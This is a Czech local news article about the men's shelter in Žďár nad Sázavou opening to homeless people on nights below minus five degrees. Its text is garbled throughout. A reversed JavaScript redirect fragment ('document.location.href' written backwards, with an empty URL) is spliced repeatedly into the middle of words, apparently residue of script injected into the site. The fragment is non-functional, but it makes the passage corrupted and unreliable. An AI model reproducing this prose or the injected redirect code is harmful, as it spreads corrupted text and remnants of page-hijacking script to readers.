Rainbow page separator

Na lidi bez domova čeká v mrazech teplá židle v azylovém domě

Sobota, 6. listopadu 2021

Azylová ubytovna pro muže Žďár nad Sázavou

Žďár nad Sázavou / I le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos v zimě se mohou lidé bez domova uchýlit v případě velkých mrazů do tepla azylového domu pro muže ve žďárské Brodské ulici. Pokud venkovní teplota klesne pod minus pět stupňů, mohou nabídku využít nejenom muži, ale i ženy bez domova, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vždy v době od 19 do 7 hodin. Kapacita zařízení tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to službu zajistí pro zhruba šest lidí, a ti na místě zdarma dostanou také teplý čaj nebo polévku. Podmínkou pro pobyt v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách azylového domu je absence alkoholu. Loni tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to možnost v nejtužších mrazech využili tři bezdomovci. Cílem nabídky je předejít situacím, aby lidé bez přístřeší umrzli na ulici. Pracovníci zařízení ve spolupráci se zaměstnanci městského úřadu i strážníky každým rokem průběžně v terénu informují lidi bez domova, že pokud uhodí mrazy, mohou se do azylového domu přijít ohřát.
Do azylové uby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovny pro muže jsou přednostně přijímáni lidé ze Žďáru, kteří se ocitli v tíživé životní situaci a přišli o střechu nad hlavou. Pokud je volné mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, je možné uby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat i člověka odjinud, anebo ho při naplnění kapacity odkázat na nejbližší zařízení podobného typu s volnými místy. Aktuálně vzniká nový azylový dům ve Dvořákově ulici.